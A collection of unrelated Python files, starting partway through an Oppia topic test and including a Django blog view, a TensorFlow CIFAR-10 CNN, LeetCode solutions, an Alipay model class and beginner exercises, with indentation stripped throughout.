'old_value': old_value,
'new_value': [self.skill_id_1]
})]
topic_services.update_topic_and_subtopic_pages(
self.user_id_admin, self.TOPIC_ID, changelist,
'Updated subtopic skill ids.')
topic_services.publish_topic(self.TOPIC_ID, self.user_id_admin)
topic_summaries = topic_fetchers.get_published_topic_summaries()
self.assertEqual(len(topic_summaries), 1)
# Ruling out the possibility of None for mypy type checking.
assert topic_summaries[0] is not None
self.assertEqual(topic_summaries[0].name, 'Name')
self.assertEqual(topic_summaries[0].canonical_story_count, 0)
self.assertEqual(topic_summaries[0].additional_story_count, 0)
self.assertEqual(topic_summaries[0].total_skill_count, 2)
self.assertEqual(topic_summaries[0].uncategorized_skill_count, 1)
self.assertEqual(topic_summaries[0].subtopic_count, 1)
def test_get_all_skill_ids_assigned_to_some_topic(self) -> None:
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_MOVE_SKILL_ID_TO_SUBTOPIC,
'old_subtopic_id': None,
'new_subtopic_id': 1,
'skill_id': self.skill_id_1
})]
topic_services.update_topic_and_subtopic_pages(
self.user_id_admin, self.TOPIC_ID, change_list,
'Moved skill to subtopic.')
topic_id = topic_fetchers.get_new_topic_id()
self.save_new_topic(
topic_id, self.user_id, name='Name 2', description='Description',
abbreviated_name='random', url_fragment='name-three',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=[self.skill_id_1, 'skill_3'],
subtopics=[], next_subtopic_id=1)
self.assertEqual(
topic_fetchers.get_all_skill_ids_assigned_to_some_topic(),
{self.skill_id_1, self.skill_id_2, 'skill_3'})
def test_get_topic_summary_from_model(self) -> None:
topic_summary_model: Optional[topic_models.TopicSummaryModel] = (
topic_models.TopicSummaryModel.get(self.TOPIC_ID)
)
# Ruling out the possibility of None for mypy type checking.
assert topic_summary_model is not None
topic_summary: topic_domain.TopicSummary = (
topic_fetchers.get_topic_summary_from_model(
topic_summary_model))
self.assertEqual(topic_summary.id, self.TOPIC_ID)
self.assertEqual(topic_summary.name, 'Name')
self.assertEqual(topic_summary.description, 'Description')
self.assertEqual(topic_summary.canonical_story_count, 0)
self.assertEqual(topic_summary.additional_story_count, 0)
self.assertEqual(topic_summary.uncategorized_skill_count, 2)
self.assertEqual(topic_summary.total_skill_count, 2)
self.assertEqual(topic_summary.subtopic_count, 1)
self.assertEqual(topic_summary.thumbnail_filename, 'topic.svg')
self.assertEqual(topic_summary.thumbnail_bg_color, '#C6DCDA')
def test_get_topic_summary_by_id(self) -> None:
topic_summary: Optional[topic_domain.TopicSummary] = (
topic_fetchers.get_topic_summary_by_id(self.TOPIC_ID)
)
# Ruling out the possibility of None for mypy type checking.
assert topic_summary is not None
self.assertEqual(topic_summary.id, self.TOPIC_ID)
self.assertEqual(topic_summary.name, 'Name')
self.assertEqual(topic_summary.description, 'Description')
self.assertEqual(topic_summary.canonical_story_count, 0)
self.assertEqual(topic_summary.additional_story_count, 0)
self.assertEqual(topic_summary.uncategorized_skill_count, 2)
self.assertEqual(topic_summary.subtopic_count, 1)
self.assertEqual(topic_summary.thumbnail_filename, 'topic.svg')
self.assertEqual(topic_summary.thumbnail_bg_color, '#C6DCDA')
fake_topic_id = topic_fetchers.get_new_topic_id()
fake_topic: Optional[topic_domain.TopicSummary] = (
topic_fetchers.get_topic_summary_by_id(
fake_topic_id, strict=False
)
)
self.assertIsNone(fake_topic)
def test_get_new_topic_id(self) -> None:
new_topic_id = topic_fetchers.get_new_topic_id()
self.assertEqual(len(new_topic_id), 12)
self.assertEqual(topic_models.TopicModel.get_by_id(new_topic_id), None)
def test_get_multi_rights(self) -> None:
topic_rights: List[Optional[topic_domain.TopicRights]] = (
topic_fetchers.get_multi_topic_rights([
self.TOPIC_ID, 'invalid_id'
])
)
# Ruling out the possibility of None for mypy type checking.
assert topic_rights[0] is not None
self.assertEqual(len(topic_rights), 2)
self.assertEqual(topic_rights[0].id, self.TOPIC_ID)
self.assertEqual(topic_rights[0].manager_ids, [self.user_id_a])
self.assertFalse(topic_rights[0].topic_is_published)
self.assertIsNone(topic_rights[1])
def test_raises_error_if_wrong_topic_rights_fetched_strictly(self) -> None:
with self.assertRaisesRegex(
Exception,
'No topic_rights exists for the given topic_id: invalid_topic_id'
):
topic_fetchers.get_multi_topic_rights(
['invalid_topic_id'], strict=True
)
|
from search_engine_parser import GoogleSearch
import asyncio
def google(query):
asyncio.set_event_loop(asyncio.new_event_loop())
final_result = ''
try:
linkIndex = 0
search_args = (query, 2)
gsearch = GoogleSearch()
gresults = gsearch.search(*search_args)
queryResult = gresults[linkIndex]["descriptions"]
length_result = len(queryResult)
final_result = ''
if length_result >= 400:
result = queryResult[:350]
final_result = find_dot(result)
elif length_result >= 300:
result = queryResult[:250]
final_result = find_dot(result)
else:
final_result = queryResult
except Exception as e:
print("Data Not Found, "+str(e))
return final_result
def find_dot(data):
dot_index = data.rfind(".")
print(dot_index)
if dot_index != -1:
return data[:dot_index+1]
else:
return data
#query = input("enter question:")
#print(google(query))
|
from itertools import accumulate as ac
N, K = map(int, input().split())
*S, = map(int, input())
l = []
c = 0
if N==1:
l.append(S[0])
else:
for i in range(N-1):
c += 1
if S[i]!=S[i+1]:
l.append(c)
c = 0
if c:
l.append(c+1)
if S[0]==0:
l = [0]+l
if S[-1]==0:
l.append(0)
size = len(l)
*a, = ac([0]+l)
group_size = min(2*K+1,size)
ans = 0
for i in range(group_size, size+1, 2):
ans = max(ans, a[i]-a[i-group_size])
print(ans) |
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
posts = [
{
'author' : 'Sayan Manik',
'title' : 'Blog post 1',
'content' : 'First Post Content',
'date_posted' : 'May 25, 2019'
},
{
'author' : 'Corey MS',
'title' : 'Blog post 2',
'content' : 'Second Post Content',
'date_posted' : 'May 25, 2019'
},
]
def home(request):
contexts = {
'posts' : posts
}
return render(request,'blogs/home.html',contexts)
def about(request):
return render(request,'blogs/about.html',{'title':'About'}) |
#coding:utf-8
import win_unicode_console
import math
import random
win_unicode_console.enable()
w_list = []
w_score = []
w_dict = []
c = 0
def lis_2_dic(key_list, val_list):
return dict(zip(key_list, val_list))
#step幅決めてrange指定
def drange(begin, end, step):
n = begin
while n + step < end:
yield n
n += step
#randomにn個、No_Scoreになるように辞書listの書き換えを行う
#既存語を未知語とした際の検証
def makedata_rand(num):
#seed値固定 ※本実験の際には外すこと
random.seed(0)
n = 0
while n < 10:
rand = random.randint(0,num)
w_score[rand] = "No_Score"
print(rand, w_list[rand], w_score[rand])
n += 1
def make_dic():
global c
f = open('pn_ja.dic.txt', 'r')
for line in f:
line = line.rstrip()
term = line.split(':')
w_list.append(term[0])
w_score.append(term[3])
# of words
c += 1
f.close()
if __name__ == "__main__":
make_dic()
w_dict = lis_2_dic(w_list, w_score)
#55125 words in dictionary
#print(c)
sorted(w_dict.items(), key = lambda x: x[1])
# print(str(k) + ": " + str(v))
check = 0
count = 0
miss, miss_c = 0, 0
for i in drange(-1.0, 1.0, 0.1):
for v in w_dict.values():
if float(v) >= i and float(v) < i+0.1:
count += 1
else:
continue
#roundバグってんだけど!
#print(str(round(i,1)) + " ~ " + str(round(i,1)+ round(0.10,1)) + ": " + str(count))
check += count
count = 0
#randomにNo_Scoreにする
makedata_rand(check)
#総単語数(あってないけど)
#print(check)
|
# -* encoding:utf-8 *-
from appium import webdriver
import time
import unittest
import os
import math
class AutoTest(unittest.TestCase):
def test_setUp(self):
desired_caps = {
'platformName' : 'Android', #测试平台的名称
'deviceName' : '192.168.56.101:5555', #连接的设备号,通过adb devices查看所得
'platformVersion' : '4.4.4', #测试平台版本,移动设备固件的版本号
'appPackage' : 'com.football.soccerbook', #应用包名
'appActivity' : 'com.soka.football.home.ui.login.activity.SplashActivity', #应用活动名
'unicodeKeyboard' : 'True', #是否使用unicode键盘输入,true则允许输入中文和特殊字符
'resetKeyboard' : 'True' #用例执行完后重置键盘为原始状态
}
# self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
self.driver = webdriver.Remote('http://0.0.0.0:4723/wd/hub',desired_caps)
self.driver.implicitly_wait(3) #隐式等待,作用介绍如下:
#当查找元素或元素并没有立即出现的时候,隐式等待将等待一段时间再查找 DOM,默认的时间是0;一旦设置了隐式等待,则它存在整个 WebDriver 对象实例的声明周期中
#它将会在寻找每个元素的时候都进行等待,这样会增加整个测试执行的时间
# def test_login(self):
# def tearDown(self):
# self.driver.quit()
if __name__ == '__main__':
# suite = unittest.TestLoader().loadTestsFromTestCase(AutoTest)
# unittest.TextTestRunner(verbosity=2).run(suite)
unittest.main() |
from numpy import*
from numpy.linalg import*
x=array(eval(input("")))
a=zeros(x.shape[1], dtype=int)
for j in range(x.shape[1]):
a[j]=sum(x[:,j])
for j in range(x.shape[1]):
if a[j]==max(a):
if j+1==1:
print("1")
if j+1==2:
print("2")
if j+1==3:
print("3")
if j+1==4:
print("4")
if j+1==5:
print("5")
if j+1==6:
print("6")
if j+1==7:
print("7")
|
tabla = int (input("Que tabla?:"))
for v in range (1 ,11 ,1 ):
print(f"{tabla} x {v} = {tabla*v}")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ExpenseCtrlEmployeeRuleInfo(object):
def __init__(self):
self._effective = None
self._effective_end_date = None
self._effective_start_date = None
self._owner_type = None
self._standard_id = None
self._standard_name = None
@property
def effective(self):
return self._effective
@effective.setter
def effective(self, value):
self._effective = value
@property
def effective_end_date(self):
return self._effective_end_date
@effective_end_date.setter
def effective_end_date(self, value):
self._effective_end_date = value
@property
def effective_start_date(self):
return self._effective_start_date
@effective_start_date.setter
def effective_start_date(self, value):
self._effective_start_date = value
@property
def owner_type(self):
return self._owner_type
@owner_type.setter
def owner_type(self, value):
self._owner_type = value
@property
def standard_id(self):
return self._standard_id
@standard_id.setter
def standard_id(self, value):
self._standard_id = value
@property
def standard_name(self):
return self._standard_name
@standard_name.setter
def standard_name(self, value):
self._standard_name = value
def to_alipay_dict(self):
params = dict()
if self.effective:
if hasattr(self.effective, 'to_alipay_dict'):
params['effective'] = self.effective.to_alipay_dict()
else:
params['effective'] = self.effective
if self.effective_end_date:
if hasattr(self.effective_end_date, 'to_alipay_dict'):
params['effective_end_date'] = self.effective_end_date.to_alipay_dict()
else:
params['effective_end_date'] = self.effective_end_date
if self.effective_start_date:
if hasattr(self.effective_start_date, 'to_alipay_dict'):
params['effective_start_date'] = self.effective_start_date.to_alipay_dict()
else:
params['effective_start_date'] = self.effective_start_date
if self.owner_type:
if hasattr(self.owner_type, 'to_alipay_dict'):
params['owner_type'] = self.owner_type.to_alipay_dict()
else:
params['owner_type'] = self.owner_type
if self.standard_id:
if hasattr(self.standard_id, 'to_alipay_dict'):
params['standard_id'] = self.standard_id.to_alipay_dict()
else:
params['standard_id'] = self.standard_id
if self.standard_name:
if hasattr(self.standard_name, 'to_alipay_dict'):
params['standard_name'] = self.standard_name.to_alipay_dict()
else:
params['standard_name'] = self.standard_name
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ExpenseCtrlEmployeeRuleInfo()
if 'effective' in d:
o.effective = d['effective']
if 'effective_end_date' in d:
o.effective_end_date = d['effective_end_date']
if 'effective_start_date' in d:
o.effective_start_date = d['effective_start_date']
if 'owner_type' in d:
o.owner_type = d['owner_type']
if 'standard_id' in d:
o.standard_id = d['standard_id']
if 'standard_name' in d:
o.standard_name = d['standard_name']
return o
|
#!/usr/bin/python
import sys
import csv
import serial
import os
from itertools import izip
from ctypes import *
from struct import pack, unpack
import struct
import binascii
# Test_branch changes
# Test_bracnh changes 2
# add string
t = 0
f = open('/home/kalach/workfile.csv', 'wb')
ser = serial.Serial('/dev/rfcomm0', timeout = 5)
x = ser.read(10) # before start need to reed this MARK BUTN
def readData(t):
x = ser.read(9) # ECG DATA
s = ord(ser.read(1)) # younger byte size of data
e = ord(ser.read(1)) # elder byte size of data
data_size = (s + e*256) - 10 # 10 - size of header
print data_size
x = ser.read(8) # pass header chunk
for i in range(0, data_size / 2):
s = ser.read(1)
e = ser.read(1)
Voltage = [unpack('B', s)[0] + unpack('b',e)[0] * 256]
temp = [t + 1]
#print Voltage
writer = csv.writer(f,delimiter='\t',lineterminator='\n',)
writer.writerows(izip(temp, Voltage))
t = temp[0]
x = ser.read(2) # pass \r\n
return temp[0]
for i in range(0, 50):
t = readData(t)
f.close()
ser.close()
|
# The knows API is already defined for you.
# return a bool, whether a knows b
def knows(a: int, b: int) -> bool:
return True
class Solution:
def findCelebrity(self, n: int) -> int:
# find candidate for celebrity
# when left and right meet at a point, this person is a potential celebrity
left, right = 0, n-1
while left < right:
if knows(left, right):
left += 1
else:
right -= 1
# verify if the candidate is a celebrity
for i in range(n):
# case 1: at least 1 person doesn't know this candidate => not a celebrity
if not knows(i, left) and i != left:
return -1
# case 2: candidate knows at least one person => not a celebrity
if knows(left, i) and i != left:
return -1
return left
|
# -*- coding: utf-8 -*-
"""Tests for pybaselines._compat.
@author: Donald Erb
Created on March 20, 2021
"""
from numpy.testing import assert_array_equal
import pytest
from pybaselines import _compat
from .conftest import _HAS_PENTAPY
def test_pentapy_installation():
"""Ensure proper setup with pentapy."""
assert _compat._HAS_PENTAPY == _HAS_PENTAPY
if not _HAS_PENTAPY:
with pytest.raises(NotImplementedError):
_compat._pentapy_solve()
def test_prange():
"""
Ensures that prange outputs the same as range.
prange should work exactly as range, regardless of whether or not
numba is installed.
"""
start = 3
stop = 9
step = 2
expected = list(range(start, stop, step))
output = list(_compat.prange(start, stop, step))
assert expected == output
def _add(a, b):
"""
Simple function that adds two things.
Will be decorated for testing.
"""
output = a + b
return output
def test_jit():
"""Ensures the jit decorator works regardless of whether or not numba is installed."""
input_1 = 5
input_2 = 6
expected = input_1 + input_2
output = _compat.jit(_add)(input_1, input_2)
assert_array_equal(expected, output)
def test_jit_kwargs():
"""Ensure the jit decorator works with kwargs whether or not numba is installed."""
input_1 = 5
input_2 = 6
expected = input_1 + input_2
output = _compat.jit(_add, cache=True)(input_1, b=input_2)
assert_array_equal(expected, output)
def test_jit_no_parentheses():
"""Ensure the jit decorator works with no parentheses whether or not numba is installed."""
@_compat.jit
def _add2(a, b):
"""
Simple function that adds two things.
For testing whether the jit decorator works without parentheses.
"""
output = a + b
return output
input_1 = 5
input_2 = 6
expected = input_1 + input_2
output = _add2(input_1, input_2)
assert_array_equal(expected, output)
def test_jit_no_inputs():
"""Ensure the jit decorator works with no arguments whether or not numba is installed."""
@_compat.jit()
def _add3(a, b):
"""
Simple function that adds two things.
For testing whether the jit decorator works without any arguments.
"""
output = a + b
return output
input_1 = 5
input_2 = 6
expected = input_1 + input_2
output = _add3(input_1, input_2)
assert_array_equal(expected, output)
def test_jit_signature():
"""Ensure the jit decorator works with a signature whether or not numba is installed."""
@_compat.jit('int64(int64, int64)')
def _add4(a, b):
"""
Simple function that adds two things.
For testing whether the jit decorator works with a function signature.
"""
output = a + b
return output
input_1 = 5
input_2 = 6
expected = input_1 + input_2
output = _add4(input_1, input_2)
assert_array_equal(expected, output)
|
from snovault import upgrade_step
from . import _get_biofeat_for_target as getbf4t
@upgrade_step('experiment_repliseq', '1', '2')
def experiment_repliseq_1_2(value, system):
if value['experiment_type'] == 'repliseq':
value['experiment_type'] = 'Repli-seq'
@upgrade_step('experiment_repliseq', '2', '3')
def experiment_repliseq_2_3(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
# if antibody_lot_id exists it should be fine in new field
@upgrade_step('experiment_chiapet', '1', '2')
def experiment_chiapet_1_2(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
@upgrade_step('experiment_chiapet', '2', '3')
def experiment_chiapet_2_3(value, system):
if value.get('experiment_type') == 'CHIA-pet':
value['experiment_type'] = 'ChIA-PET'
@upgrade_step('experiment_damid', '1', '2')
def experiment_damid_1_2(value, system):
if value.get('index_pcr_cycles'):
value['pcr_cycles'] = value['index_pcr_cycles']
del value['index_pcr_cycles']
if value.get('fusion'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['fusion']
else:
value['notes'] = value['fusion']
del value['fusion']
@upgrade_step('experiment_mic', '1', '2')
def experiment_mic_1_2(value, system):
fish_dict = {'DNA-FiSH': 'DNA FISH', 'RNA-FiSH': 'RNA FISH', 'FiSH': 'FISH'}
if value.get('experiment_type') and value['experiment_type'] in fish_dict.keys():
value['experiment_type'] = fish_dict[value['experiment_type']]
@upgrade_step('experiment_seq', '1', '2')
def experiment_seq_1_2(value, system):
# sticking the string in antibody field into Notes
# will require subsequent manual fix to link to Antibody object
if value.get('antibody'):
if value.get('notes'):
value['notes'] = value['notes'] + '; ' + value['antibody']
else:
value['notes'] = value['antibody']
del value['antibody']
@upgrade_step('experiment_seq', '2', '3')
def experiment_seq_2_3(value, system):
if value.get('experiment_type') == 'CHIP-seq':
value['experiment_type'] = 'ChIP-seq'
@upgrade_step('experiment_atacseq', '1', '2')
@upgrade_step('experiment_capture_c', '1', '2')
@upgrade_step('experiment_chiapet', '3', '4')
@upgrade_step('experiment_damid', '2', '3')
@upgrade_step('experiment_hi_c', '1', '2')
@upgrade_step('experiment_mic', '2', '3')
@upgrade_step('experiment_repliseq', '3', '4')
@upgrade_step('experiment_seq', '3', '4')
@upgrade_step('experiment_tsaseq', '1', '2')
def experiment_1_2(value, system):
exptype = value.get('experiment_type')
if exptype == 'Repli-seq':
tot_fracs = value.get('total_fractions_in_exp', 2)
if tot_fracs > 2:
exptype = 'Multi-stage Repli-seq'
else:
exptype = '2-stage Repli-seq'
elif exptype == 'DAM-ID seq':
exptype = 'DamID-seq'
valid_exptypes = system['registry']['collections']['ExperimentType']
exptype_item = valid_exptypes.get(exptype)
if not exptype_item:
exptypename = exptype.lower().replace(' ', '-')
exptype_item = valid_exptypes.get(exptypename)
exptype_uuid = None
try:
exptype_uuid = str(exptype_item.uuid)
except AttributeError:
note = '{} ITEM NOT FOUND'.format(exptype)
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
value['experiment_type'] = exptype_uuid
@upgrade_step('experiment_seq', '4', '5')
@upgrade_step('experiment_chiapet', '4', '5')
@upgrade_step('experiment_damid', '3', '4')
@upgrade_step('experiment_tsaseq', '2', '3')
def experiment_targeted_factor_upgrade(value, system):
factor = value.get('targeted_factor')
if factor:
del value['targeted_factor']
note = 'Old Target: {}'.format(factor)
targets = system['registry']['collections']['Target']
biofeats = system['registry']['collections']['BioFeature']
target = targets.get(factor)
if target:
bfuuid = getbf4t(target, biofeats)
if bfuuid:
value['targeted_factor'] = [bfuuid]
else:
note = 'UPDATE NEEDED: ' + note
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
@upgrade_step('experiment_capture_c', '2', '3')
def experiment_capture_c_1_2(value, system):
tregions = value.get('targeted_regions')
if tregions:
new_vals = []
del value['targeted_regions']
targets = system['registry']['collections']['Target']
biofeats = system['registry']['collections']['BioFeature']
note = ''
for tr in tregions:
t = tr.get('target') # it's required
of = tr.get('oligo_file', '')
tstr = 'Old Target: {} {}'.format(t, of)
target = targets.get(t)
if target:
bfuuid = getbf4t(target, biofeats)
if bfuuid:
tinfo = {'target': [bfuuid]}
if of:
tinfo['oligo_file'] = of
new_vals.append(tinfo)
else:
tstr = 'UPDATE NEEDED: ' + tstr
note += tstr
if new_vals:
value['targeted_regions'] = new_vals
if 'notes' in value:
note = value['notes'] + '; ' + note
value['notes'] = note
|
# -*- coding: utf-8 -*-
# @Time : 2019/9/7 18:09
# @Author : LI Dongdong
# @FileName: lc 208.py
class TrieNode:
def __init__(self):
# 是否构成一个完成的单词
self.is_end = False
self.children = [None] * 26
class Trie:
def __init__(self):
"""
Initialize your data structure here.
"""
#代替了每一步中都要建立根节点的步骤
self.root = TrieNode()
def insert(self, word: str) -> None:
"""
Inserts a word into the trie.
"""
##############网络方法##############
p = self.root
n = len(word)
for i in range(n):
if p.children[ord(word[i]) - ord('a')] is None:
new_node = TrieNode()
if i == n - 1:
new_node.is_end = True
p.children[ord(word[i]) - ord('a')] = new_node
p = new_node
else:
#在重复插入,比如woord和wor时,此段用上
p = p.children[ord(word[i]) - ord('a')]
if i == n - 1:
p.is_end = True
return
def search(self,word:str) -> bool:
"""""
Returns if the word is in the trie
"""""
p=self.root
#判断word每个字母都在trie里
for c in word:
#children里保存节点,相当于有节点有属性children,children为list,list里保存下级节点
#p在更新
p=p.children[ord(c)-ord('a')]
if p is None:
return False
#判断word的最后一个字母在tie中有结尾属性,即不会出现word=app,tie中是appl,从而报true的错误
if p.is_end:
return True
else:
return False
def startsWith(self, prefix: str) -> bool:
"""
Returns if there is any word in the trie that starts with the given prefix.
"""
p=self.root
for c in prefix:
p=p.children[ord(c)-ord('a')]
if p is None:
return False
return True
obj = Trie()
obj.insert('woord')
obj.insert('wod')
obj.insert('aod')
obj.search('wooe') |
import tensorflow as tf
import numpy as np
import load_cifer10
import random
np.random.seed(20160612)
tf.set_random_seed(20160612)
# ネットワーク構成
class layer:
def __init__(self):
with tf.Graph().as_default():
self.prepare_model()
self.prepare_session()
def prepare_model(self):
with tf.name_scope('input_layer'):
with tf.name_scope('input_size'):
input_size = 3072
with tf.name_scope('x'):
x = tf.placeholder(tf.float32, [None, input_size])
with tf.name_scope('x_image'):
x_image = tf.reshape(x, [-1, 32, 32, 3])
with tf.name_scope('conv_layer3'):
with tf.name_scope('num_filter3'):
num_filters3 = 16
with tf.name_scope('W_conv3'):
W_conv3 = tf.Variable(tf.truncated_normal([3, 3, 3, num_filters3],
stddev=0.1))
with tf.name_scope('h_conv3'):
h_conv3 = tf.nn.conv2d(x_image, W_conv3,
strides=[1, 1, 1, 1], padding='SAME')
with tf.name_scope('b_conv3'):
b_conv3 = tf.Variable(tf.constant(0.1, shape=[num_filters3]))
with tf.name_scope('h_pool3'):
h_pool3 = tf.nn.max_pool(h_conv3, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
with tf.name_scope('h_conv3_cutoff'):
h_conv3_cutoff = tf.nn.relu(h_pool3 + b_conv3)
with tf.name_scope('conv_layer2'):
with tf.name_scope('num_filter2'):
num_filters2 = 32
with tf.name_scope('W_conv2'):
W_conv2 = tf.Variable(tf.truncated_normal([4, 4, num_filters3, num_filters2],
stddev=0.1))
with tf.name_scope('h_conv2'):
h_conv2 = tf.nn.conv2d(h_conv3_cutoff, W_conv2,
strides=[1, 1, 1, 1], padding='SAME')
with tf.name_scope('b_conv2'):
b_conv2 = tf.Variable(tf.constant(0.1, shape=[num_filters2]))
with tf.name_scope('h_pool2'):
h_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
with tf.name_scope('h_conv_cutoff'):
h_conv2_cutoff = tf.nn.relu(h_pool2 + b_conv2)
with tf.name_scope('conv_layer1'):
with tf.name_scope('num_filter1'):
num_filters1 = 3 # 64
with tf.name_scope('W_conv1'):
W_conv1 = tf.Variable(
tf.truncated_normal([5, 5, num_filters2, num_filters1],
stddev=0.1))
with tf.name_scope('h_conv1'):
h_conv1 = tf.nn.conv2d(h_conv2_cutoff, W_conv1,
strides=[1, 1, 1, 1], padding='SAME')
with tf.name_scope('b_conv1'):
b_conv1 = tf.Variable(tf.constant(0.1, shape=[num_filters1]))
with tf.name_scope('h_pool1'):
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
with tf.name_scope('h_conv1'):
h_conv1_cutoff = tf.nn.relu(h_pool1 + b_conv1)
with tf.name_scope('h_pool1_flat'):
h_pool1_flat = tf.reshape(h_conv1_cutoff, [-1, 4 * 4 * num_filters1])
with tf.name_scope('num_units2'):
num_units2 = 4 * 4 * num_filters1
"""
with tf.name_scope('W_conv1'):
W_conv1 = tf.Variable(
tf.truncated_normal([5, 5, num_filters2, num_filters1],
stddev=0.1))
with tf.name_scope('h_conv1'):
h_conv1 = tf.nn.conv2d(h_conv2_cutoff, W_conv1,
strides=[1, 1, 1, 1], padding='SAME')
with tf.name_scope('b_conv1'):
b_conv1 = tf.Variable(tf.constant(0.1, shape=[num_filters1]))
with tf.name_scope('h_pool1'):
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
with tf.name_scope('h_conv1'):
h_conv1_cutoff = tf.nn.relu(h_pool1 + b_conv1)
with tf.name_scope('h_pool1_flat'):
h_pool1_flat = tf.reshape(h_conv1_cutoff, [-1, 4 * 4 * num_filters1])
with tf.name_scope('num_units2'):
num_units2 = 4 * 4 * num_filters1
"""
with tf.name_scope('layer1_fully_connected'):
with tf.name_scope('num_units1'):
num_units1 = 1024
with tf.name_scope('w1'):
w1 = tf.Variable(tf.truncated_normal([num_units2, num_units1]))
with tf.name_scope('b1'):
b1 = tf.Variable(tf.constant(0.1, shape=[num_units1]))
with tf.name_scope('hidden1'):
hidden1 = tf.nn.relu(tf.matmul(h_pool1_flat, w1) + b1)
with tf.name_scope('keep_prob'):
keep_prob = tf.placeholder(tf.float32)
with tf.name_scope('hidden1_drop'):
hidden1_drop = tf.nn.dropout(hidden1, keep_prob)
with tf.name_scope('layer0_output_fully_connected'):
with tf.name_scope('w0'):
w0 = tf.Variable(tf.zeros([num_units1, 10]))
with tf.name_scope('b0'):
b0 = tf.Variable(tf.zeros([10]))
with tf.name_scope('p'):
p = tf.nn.softmax(tf.matmul(hidden1_drop, w0) + b0)
t = tf.placeholder(tf.float32, [None, 10])
with tf.name_scope('optimizer'):
with tf.name_scope('loss'):
loss = -tf.reduce_sum(t * tf.log(tf.clip_by_value(p, 1e-10, 1.0)))
with tf.name_scope('train_step'):
train_step = tf.train.AdamOptimizer(0.0001).minimize(loss)
with tf.name_scope('correct_prediction'):
correct_prediction = tf.equal(tf.argmax(p, 1), tf.argmax(t, 1))
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar("loss", loss)
tf.summary.scalar("accuracy", accuracy)
tf.summary.scalar("w0", tf.reduce_sum(w0))
tf.summary.scalar("w1", tf.reduce_sum(w1))
self.x, self.t, self.p = x, t, p
self.train_step = train_step
self.loss = loss
self.accuracy = accuracy
self.keep_prob = keep_prob
def prepare_session(self):
sess = tf.InteractiveSession()
sess.run(tf.initialize_all_variables())
summary = tf.summary.merge_all()
writer = tf.summary.FileWriter("./log/1023_CNN_nonliner", sess.graph)
# ここでログファイルを保存するディレクトリとファイル名を決定する
self.sess = sess
self.summary = summary
self.writer = writer
if __name__ == '__main__':
data, labels_non_onehot, test_data, test_labels_non_onehot, label_names = load_cifer10.load_dataset()
print(label_names)
labels = np.mat([[0 for i in range(10)] for k in range(len(labels_non_onehot))])
for i in range(len(labels)):
labels[i] = np.eye(10)[labels_non_onehot[i]]
test_labels = np.mat([[0 for i in range(10)] for k in range(len(test_labels_non_onehot))])
for i in range(len(test_labels)):
test_labels[i] = np.eye(10)[test_labels_non_onehot[i]]
nn = layer()
batchsize = 100
batch_xs = np.mat([[0.0 for n in range(3072)] for k in range(batchsize)])
batch_ts = np.mat([[0.0 for n in range(10)] for k in range(batchsize)])
print(test_data[0].shape)
print(test_data.shape)
loop_len = 200000
for i in range(loop_len):
for n in range(batchsize):
tmp = int(random.uniform(0, len(data)))
batch_xs[n] = data[tmp].reshape(1, 3072)
batch_xs[n] /= batch_xs[n].max()
batch_ts[n] = labels[tmp].reshape(1, 10)
nn.sess.run(nn.train_step, feed_dict={nn.x: batch_xs, nn.t: batch_ts, nn.keep_prob: 1.0})
if i % 100 == 0:
summary, loss_val, acc_val = nn.sess.run(
[nn.summary, nn.loss, nn.accuracy],
feed_dict={nn.x: test_data, nn.t: test_labels, nn.keep_prob: 1.0})
print('Step: %d, Loss: %f, Accuracy: %f'
% (i, loss_val, acc_val))
nn.writer.add_summary(summary, i)
i += 1
|
import sys
from random import randint
from PyQt5 import uic, QtCore, QtWidgets
from PyQt5.QtGui import QPainter, QColor
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QMainWindow
from UI import Ui_MainWindow
class YellowEllipses(QMainWindow, Ui_MainWindow):
def __init__(self):
super().__init__()
self.painter = QPainter(self)
self.setupUi(self)
self.do_paint = False
self.initUI()
def initUI(self):
self.setWindowTitle('Git и жёлтые окружности')
self.generate_btn.clicked.connect(self.paint)
def paintEvent(self, event):
if self.do_paint:
qp = QPainter()
qp.begin(self)
self.generate(qp)
qp.end()
def paint(self):
self.do_paint = True
self.repaint()
def generate(self, qp):
x, y = randint(0, 500), randint(0, 500)
qp.setBrush(QColor(randint(0, 255), randint(0, 255), randint(0, 255)))
qp.drawEllipse(self.ellipse_label.x(), self.ellipse_label.y(), x, y)
self.do_paint = False
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = YellowEllipses()
ex.show()
sys.exit(app.exec())
|
# 1
# name = input("What is your name?: \n")
# print("Hello " + name)
# 2
# x = 10
# print(x)
#3
# personNumber = int(input("Choose any whole number: \n"))
# if personNumber > 10:
# print("Your number is greater than 10")
# elif personNumber < 10:
# print("Your number is less than 10")
# else:
# print("Your number is 10")
#4
# personNumber2 = int(input("Choose any whole number: \n"))
# if personNumber2 % 2 == 0:
# print("Even")
# else:
# print("Odd")
#5
